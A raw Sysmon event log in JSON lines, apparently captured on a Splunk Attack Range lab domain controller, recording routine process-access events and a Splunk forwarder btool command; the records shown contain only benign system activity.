06:51:46.616","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3339,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3340,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3341,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1102-5F25-0000-001043670500}\r\nTargetProcessId: 1408\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1102-5F25-0000-001043670500}","TargetProcessId":"1408","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3342,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.621\r\nProcessGuid: {E2A3D6B1-1102-5F25-0000-001000680500}\r\nProcessId: 1576\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list httpServer --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {E2A3D6B1-1102-5F25-0000-001043670500}\r\nParentProcessId: 1408\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list httpServer --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.621","ProcessGuid":"{E2A3D6B1-1102-5F25-0000-001000680500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list httpServer --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{E2A3D6B1-1102-5F25-0000-001043670500}","ParentProcessId":"1408","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list httpServer --no-log","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3343,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-1102-5F25-0000-001043670500}\r\nSourceProcessId: 1408\r\nSourceThreadId: 1412\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-1102-5F25-0000-001000680500}\r\nTargetProcessId: 1576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-1102-5F25-0000-001043670500}","SourceProcessId":"1408","SourceThreadId":"1412","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-1102-5F25-0000-001000680500}","TargetProcessId":"1576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3344,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1102-5F25-0000-001000680500}\r\nTargetProcessId: 1576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1102-5F25-0000-001000680500}","TargetProcessId":"1576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3345,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3346,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3347,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\